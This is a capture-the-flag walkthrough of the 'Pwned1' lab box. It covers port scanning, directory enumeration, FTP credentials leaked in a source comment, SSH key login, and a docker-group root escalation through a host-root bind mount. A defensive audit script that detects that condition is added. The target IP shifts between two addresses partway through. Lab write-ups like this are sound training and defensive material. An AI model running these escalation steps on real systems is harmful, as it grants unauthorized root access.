Pwned1 Walkthrough (Proving Grounds) — Root Access via FTP and Docker Privilege Escalation
This guide provides a walkthrough for the “Pwned1” box, focusing on reconnaissance, enumeration, exploitation, and privilege escalation to root using FTP credentials and Docker. Let’s dive in.
Step 1: Initial Scanning with Nmap
Start by scanning the target IP (192.168.172.95) for open ports:
nmap 192.168.172.95
The scan reveals that ports 21 (FTP), 22 (SSH), and 80 (HTTP) are open. To gather further information on these ports, use the following command:
sudo nmap -p 21,22,80 192.168.172.95 -sC -sV -O -oN nmap_scan.txt
Scan Results:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
The HTTP title on port 80 reads “Pwned….!!”, which hints at potential clues or content for further exploration.
Step 2: Web Directory Enumeration with Gobuster
To discover hidden directories on the web server, run a Gobuster scan:
gobuster dir -u http://192.168.172.95/ -w common.txt -t 50
Gobuster Results:
/index.html
/robots.txt
/hidden_text/secret.dic
/pwned.vuln
The robots.txt file contains the following:
User-agent: *
Allow: /nothing
Allow: /hidden_text
Inside /hidden_text, there’s a secret.dic file with additional directories, including /pwned.vuln.
Step 3: FTP Credentials Discovery
Upon inspecting the source code of `http://192.168.172.95/pwned.vuln`, we find FTP credentials in the comments:
// if ($un=='ftpuser' && $pw=='B0ss_Pr!ncesS') {
Step 4: FTP Login and File Retrieval
Login to the FTP server using these credentials:
ftp 192.168.214.95
Navigate through the directories and find “id_rsa” (an SSH private key) and “note.txt”. Download these files to your local machine for further analysis.
Set restrictive permissions on id_rsa, since SSH refuses to use a private key that other users can read:
chmod 600 id_rsa
Read note.txt:
cat note.txt
The note reveals a potential user, “Ariana.” Use the “id_rsa” file to attempt an SSH connection as “Ariana.”
Step 5: SSH Login and Shell Stabilization
ssh -i id_rsa ariana@192.168.214.95
The user flag can be read at this point.
Once logged in, stabilize the shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Step 6: Privilege Escalation via Docker
Run `id` to check group memberships:
id
If ariana is a member of the docker group, that is effectively root: any member can talk to the Docker daemon, which runs as root, and start a container that bind-mounts the host filesystem. List the available Docker images:
docker images
Run a container that bind-mounts the host's root filesystem and chroots into it:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Inside the chroot, upgrade to a bash pty as before:
python3 -c 'import pty; pty.spawn("/bin/bash")'
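The docker group membership and the host-root bind mount used in Step 6 are exactly what a defender should be auditing for. Below is an added example, not from the original walkthrough, written in POSIX sh: a helper that flags docker-group members in /etc/group-style text and spots docker command lines that bind-mount the host's / (as found in auditd execve records or shell history). The group file content, user names and command lines are constructed samples.

```sh
#!/bin/sh
# Added audit helper (not from the original walkthrough). Flags the two
# conditions the Step 6 escalation depends on:
#   1. accounts in the "docker" group: a member can start a container that
#      bind-mounts the host's / and chroot into it, so membership is
#      root-equivalent;
#   2. a docker command line that bind-mounts the host root.
# Functions take their input as text so the script runs stand-alone.

# Print the docker group's members, space-separated, from /etc/group text.
docker_group_members() {
    printf '%s\n' "$1" | while IFS=: read -r name pw gid members; do
        if [ "$name" = docker ] && [ -n "$members" ]; then
            IFS=,; set -- $members; IFS=' '   # split the comma-separated list
            printf '%s\n' "$*"
        fi
    done
}

# True (exit 0) when at least one account is in the docker group.
has_docker_group_members() {
    [ -n "$(docker_group_members "$1")" ]
}

# True (exit 0) when a docker command line mounts the host root into the
# container: "-v /:...", "--volume /:..." or "--mount ...source=/,...".
mounts_host_root() {
    case " $1 " in
        *" -v /:"*|*" --volume /:"*|*" --mount "*"source=/,"*|*" --mount "*"src=/,"*)
            return 0 ;;
    esac
    return 1
}

# Constructed samples, not data captured from the target.
SAMPLE_GROUP='root:x:0:
sudo:x:27:
docker:x:998:ariana,selena
ftp:x:115:ftpuser'
SAMPLE_CMD='docker run -v /:/mnt --rm -it alpine chroot /mnt sh'
SAMPLE_SAFE_CMD='docker run --rm -it -v /srv/app:/app alpine sh'

# Stand-alone run: report findings without failing the script.
if has_docker_group_members "$SAMPLE_GROUP"; then
    echo "WARNING: docker group is root-equivalent; members: $(docker_group_members "$SAMPLE_GROUP")"
fi
for cmd in "$SAMPLE_CMD" "$SAMPLE_SAFE_CMD"; do
    if mounts_host_root "$cmd"; then echo "WARNING: host / bind-mounted: $cmd"; fi
done
```

Only the space-separated option forms are matched; `-v=/:/mnt` and mounts declared in compose files are out of scope for this check.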
Final Steps: Accessing Root Files
With a root shell, read the flags in /root:
cd /root/
ls
cat root.txt
cat proof.txt